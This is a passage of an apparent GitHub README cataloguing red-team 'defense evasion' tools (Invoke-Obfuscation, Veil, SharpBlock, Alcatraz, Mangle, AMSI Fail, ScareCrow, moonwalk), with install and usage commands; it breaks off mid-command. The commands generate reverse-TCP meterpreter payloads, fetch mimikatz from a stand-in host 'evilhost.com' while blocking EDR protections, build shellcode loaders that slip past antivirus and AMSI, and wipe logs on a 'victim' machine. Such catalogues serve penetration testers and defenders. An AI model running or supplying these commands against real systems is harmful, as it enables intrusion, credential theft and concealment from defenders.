src="https://private-user-images.githubusercontent.com/100603074/238469103-4c84ffeb-1ffb-474a-b028-4c8fcc64deb6.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvMjM4NDY5MTAzLTRjODRmZmViLTFmZmItNDc0YS1iMDI4LTRjOGZjYzY0ZGViNi5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xNjg5NzFlZTQ3ZTMwYWVkMGNhMDc3NTJkMzhhZjk0ODgyYzRhZjlkNDlmOWNjYjMyOTE2MjczNWM0YjA3YTc5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.9IdQ4ZIl9Z0B2U5z4hH5EwnKIbIG5d8vhTskYY_KgJ4" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/AlessandroZ/BeRoot">https://github.com/AlessandroZ/BeRoot</a></em></p> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Defense Evasion</h1><a id="user-content-defense-evasion" class="anchor" aria-label="Permalink: Defense Evasion" href="#defense-evasion"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/danielbohannon/Invoke-Obfuscation">Invoke-Obfuscation</a></h3><a id="user-content-invoke-obfuscation" class="anchor" aria-label="Permalink: 🔙Invoke-Obfuscation" href="#invoke-obfuscation"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A PowerShell v2.0+ compatible PowerShell command and script obfuscator. If a victim endpoint is able to execute PowerShell then this tool is great for creating heavily obfuscated scripts.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/danielbohannon/Invoke-Obfuscation.git"><pre>git clone https://github.com/danielbohannon/Invoke-Obfuscation.git</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./Invoke-Obfuscation"><pre>./Invoke-Obfuscation</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png"><img src="https://user-images.githubusercontent.com/100603074/206557377-a522ab7a-5803-48b0-8f3e-d7d7b607e692.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/Veil-Framework/Veil">Veil</a></h3><a id="user-content-veil" class="anchor" aria-label="Permalink: 🔙Veil" href="#veil"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Veil is a tool for generating metasploit payloads that bypass common anti-virus solutions.</p> <p dir="auto">It can be used to generate obfuscated shellcode, see the official <a href="https://www.veil-framework.com/" rel="nofollow">veil framework blog</a> for more info.</p> <p dir="auto"><strong>Install: (Kali)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="apt -y install veil /usr/share/veil/config/setup.sh --force --silent"><pre>apt -y install veil /usr/share/veil/config/setup.sh --force --silent</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git cd Veil/ ./config/setup.sh --force --silent"><pre>sudo apt-get -y install git git clone https://github.com/Veil-Framework/Veil.git <span class="pl-c1">cd</span> Veil/ ./config/setup.sh --force --silent</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-payloads # List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance) ./Veil.py -t Ordnance --list-encoders # Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234 ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234 # List all payloads (–list-payloads) for the tool Evasion (-t Evasion) ./Veil.py -t Evasion --list-payloads # Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris ./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris"><pre><span class="pl-c"><span class="pl-c">#</span> List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)</span> ./Veil.py -t Ordnance --list-payloads <span class="pl-c"><span class="pl-c">#</span> List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)</span> ./Veil.py -t Ordnance --list-encoders <span class="pl-c"><span class="pl-c">#</span> Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234</span> ./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234 <span class="pl-c"><span class="pl-c">#</span> List all payloads (–list-payloads) for the tool Evasion (-t Evasion)</span> ./Veil.py -t Evasion --list-payloads <span class="pl-c"><span class="pl-c">#</span> Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris</span> ./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris</pre></div> <p dir="auto">Veil creators wrote a nice <a href="https://www.veil-framework.com/veil-command-line-usage/" rel="nofollow">blog post</a> explaining further ordnance and evasion command line usage.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png"><img src="https://user-images.githubusercontent.com/100603074/210136422-6b17671f-8868-4747-a7fe-e75d36b99e61.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/CCob/SharpBlock">SharpBlock</a></h3><a id="user-content-sharpblock" class="anchor" aria-label="Permalink: 🔙SharpBlock" href="#sharpblock"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A method of bypassing EDR's active projection DLL's by preventing entry point execution.</p> <p dir="auto"><strong>Features:</strong></p> <ul dir="auto"> <li>Blocks EDR DLL entry point execution, which prevents EDR hooks from being placed.</li> <li>Patchless AMSI bypass that is undetectable from scanners looking for Amsi.dll code patches at runtime.</li> <li>Host process that is replaced with an implant PE that can be loaded from disk, HTTP or named pipe (Cobalt Strike).</li> <li>Implanted process is hidden to help evade scanners looking for hollowed processes.</li> <li>Command line args are spoofed and implanted after process creation using stealthy EDR detection method.</li> <li>Patchless ETW bypass.</li> <li>Blocks NtProtectVirtualMemory invocation when callee is within the range of a blocked DLL's address space.</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Use <a href="https://visualstudio.microsoft.com/vs/community/" rel="nofollow">Visual Studio 2019 Community Edition</a> to compile the SharpBlock binary.</p> <p dir="auto">Open the SharpBlock <a href="https://github.com/CCob/SharpBlock">project .sln</a>, choose "Release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee # Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi"><pre><span class="pl-c"><span class="pl-c">#</span> Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL</span> SharpBlock -e http://evilhost.com/mimikatz.bin -s c:<span class="pl-cce">\w</span>indows<span class="pl-cce">\s</span>ystem32<span class="pl-cce">\n</span>otepad.exe -d <span class="pl-s"><span class="pl-pds">"</span>Active Protection DLL for SylantStrike<span class="pl-pds">"</span></span> -a coffee <span class="pl-c"><span class="pl-c">#</span> Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL</span> execute-assembly SharpBlock.exe -e <span class="pl-cce">\\</span>.<span class="pl-cce">\p</span>ipe<span class="pl-cce">\m</span>imi -s c:<span class="pl-cce">\w</span>indows<span class="pl-cce">\s</span>ystem32<span class="pl-cce">\n</span>otepad.exe -d <span class="pl-s"><span class="pl-pds">"</span>Active Protection DLL for SylantStrike<span class="pl-pds">"</span></span> -a coffee upload_file /home/haxor/mimikatz.exe <span class="pl-cce">\\</span>.<span class="pl-cce">\p</span>ipe<span class="pl-cce">\m</span>imi</pre></div> <p dir="auto">Nice PenTestPartners blog post <a href="https://www.pentestpartners.com/security-blog/patchless-amsi-bypass-using-sharpblock/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png"><img src="https://user-images.githubusercontent.com/100603074/210983524-d6ea4255-7c47-45bb-8b13-9f6240735b0e.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://youtu.be/0W9wkamknfM" rel="nofollow">https://youtu.be/0W9wkamknfM</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/weak1337/Alcatraz">Alcatraz</a></h3><a id="user-content-alcatraz" class="anchor" aria-label="Permalink: 🔙Alcatraz" href="#alcatraz"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Alcatraz is a GUI x64 binary obfuscator that is able to obfuscate various different pe files including:</p> <ul dir="auto"> <li>.exe</li> <li>.dll</li> <li>.sys</li> </ul> <p dir="auto">Some supported obfuscation features include:</p> <ul dir="auto"> <li>Obfuscation of immediate moves</li> <li>Control flow flattening</li> <li>ADD mutation</li> <li>Entry-point obfuscation</li> <li>Lea obfuscation</li> </ul> <p dir="auto"><strong>Install: (Requirements)</strong></p> <p dir="auto">Install: <a href="https://vcpkg.io/en/getting-started.html" rel="nofollow">https://vcpkg.io/en/getting-started.html</a></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows"><pre>vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows</pre></div> <p dir="auto"><strong>Usage:</strong></p> <p dir="auto">Using the GUI to obfuscate a binary:</p> <ol dir="auto"> <li>Load a binary by clicking <code>file</code> in the top left corner.</li> <li>Add functions by expanding the <code>Functions</code> tree. (You can search by putting in the name in the searchbar at the top)</li> <li>Hit <code>compile</code> (<strong>Note:</strong> <em>Obfuscating lots of functions might take some seconds</em>)</li> </ol> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png"><img src="https://user-images.githubusercontent.com/100603074/211530410-12982326-8fff-4415-bdde-2ebf6db2ae6c.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/weak1337/Alcatraz">https://github.com/weak1337/Alcatraz</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/optiv/Mangle">Mangle</a></h3><a id="user-content-mangle" class="anchor" aria-label="Permalink: 🔙Mangle" href="#mangle"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL).</p> <p dir="auto">Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files.</p> <p dir="auto">In doing so, Mangle helps loaders evade on-disk and in-memory scanners.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="go get github.com/Binject/debug/pe"><pre class="notranslate"><code>go get github.com/Binject/debug/pe </code></pre></div> <p dir="auto">Then build it</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go"><pre class="notranslate"><code>git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content=" -C string Path to the file containing the certificate you want to clone -I string Path to the orginal file -M Edit the PE file to strip out Go indicators -O string The new file name -S int How many MBs to increase the file by"><pre> -C string Path to the file containing the certificate you want to clone -I string Path to the orginal file -M Edit the PE file to strip out Go indicators -O string The new file name -S int How many MBs to increase the file by</pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/optiv/Mangle#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png"><img src="https://user-images.githubusercontent.com/100603074/216736894-ce46ac43-52b8-42bd-9f03-5d7656a635ff.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/optiv/Mangle">https://github.com/optiv/Mangle</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="http://amsi.fail/" rel="nofollow">AMSI Fail</a></h3><a id="user-content-amsi-fail" class="anchor" aria-label="Permalink: 🔙AMSI Fail" href="#amsi-fail"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">AMSI.fail is a great website that can be used to generate obfuscated PowerShell snippets that break or disable AMSI for the current process.</p> <p dir="auto">The snippets are randomly selected from a small pool of techniques/variations before being obfuscated. Every snippet is obfuscated at runtime/request so that no generated output share the same signatures.</p> <p dir="auto">Nice f-secure blog explaining AMSI <a href="https://blog.f-secure.com/hunting-for-amsi-bypasses/" rel="nofollow">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png"><img src="https://user-images.githubusercontent.com/100603074/217655078-919e9c98-4c78-4c2b-a695-3e1c4d3f1e65.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="http://amsi.fail/" rel="nofollow">http://amsi.fail/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/optiv/ScareCrow">ScareCrow</a></h3><a id="user-content-scarecrow" class="anchor" aria-label="Permalink: 🔙ScareCrow" href="#scarecrow"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">ScareCrow is a payload creation framework for side loading (not injecting) into a legitimate Windows process (bypassing Application Whitelisting controls).</p> <p dir="auto">Once the DLL loader is loaded into memory, it utilizes a technique to flush an EDR’s hook out of the system DLLs running in the process's memory.</p> <p dir="auto">When executed, ScareCrow will copy the bytes of the system DLLs stored on disk in <code>C:\Windows\System32\</code>. These DLLs are stored on disk “clean” of EDR hooks because they are used by the system to load an unaltered copy into a new process when it’s spawned. Since EDR’s only hook these processes in memory, they remain unaltered.</p> <p dir="auto">Nice blogs for learning about techniques utilized by ScareCrow:</p> <ul dir="auto"> <li><a href="https://www.optiv.com/explore-optiv-insights/source-zero/endpoint-detection-and-response-how-hackers-have-evolved" rel="nofollow">Endpoint Detection and Response: How Hackers Have Evolved</a></li> <li><a href="https://www.optiv.com/explore-optiv-insights/source-zero/edr-and-blending-how-attackers-avoid-getting-caught" rel="nofollow">EDR and Blending In: How Attackers Avoid Getting Caught</a></li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto"><em>ScareCrow requires golang 1.16.1 or later to compile loaders.</em></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Clone git clone https://github.com/optiv/ScareCrow cd ScareCrow # Install dependencies go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo # Required openssl osslsigncode mingw-w64 # Build go build ScareCrow.go"><pre><span class="pl-c"><span class="pl-c">#</span> Clone</span> git clone https://github.com/optiv/ScareCrow <span class="pl-c1">cd</span> ScareCrow <span class="pl-c"><span class="pl-c">#</span> Install dependencies</span> go get github.com/fatih/color go get github.com/yeka/zip go get github.com/josephspurrier/goversioninfo <span class="pl-c"><span class="pl-c">#</span> Required</span> openssl osslsigncode mingw-w64 <span class="pl-c"><span class="pl-c">#</span> Build</span> go build ScareCrow.go</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Usage of ./ScareCrow: -I string Path to the raw 64-bit shellcode. -Loader string Sets the type of process that will sideload the malicious payload: [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. [*] excel - Loads into a hidden Excel process using a JScript loader. [*] msiexec - Loads into MSIexec process using a JScript loader. [*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. ..."><pre class="notranslate"><code>Usage of ./ScareCrow: -I string Path to the raw 64-bit shellcode. -Loader string Sets the type of process that will sideload the malicious payload: [*] binary - Generates a binary based payload. (This type does not benefit from any sideloading) [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated. [*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions. [*] excel - Loads into a hidden Excel process using a JScript loader. [*] msiexec - Loads into MSIexec process using a JScript loader. [*] wscript - Loads into WScript process using a JScript loader. (default "binary") -O string Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required. -configfile string The path to a json based configuration file to generate custom file attributes. This will not use the default ones. -console Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature. ... </code></pre></div> <p dir="auto">Full usage information can be found <a href="https://github.com/optiv/ScareCrow#loader">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png"><img src="https://user-images.githubusercontent.com/100603074/220959052-029eac69-0b38-40d5-bc1a-7e90b0c93726.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/optiv/ScareCrow">https://github.com/optiv/ScareCrow</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/mufeedvh/moonwalk">moonwalk</a></h3><a id="user-content-moonwalk" class="anchor" aria-label="Permalink: 🔙moonwalk" href="#moonwalk"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">moonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.</p> <p dir="auto">It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk"><pre>curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Start moonwalk straight after getting a shell on the victim Linux endpoint curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk chmod +x moonwalk moonwalk start # Once you are finished, clear your traces moonwalk finish"><pre><span class="pl-c"><span class="pl-c">#</span> Start moonwalk straight after getting a shell on the victim Linux endpoint</span> curl -L 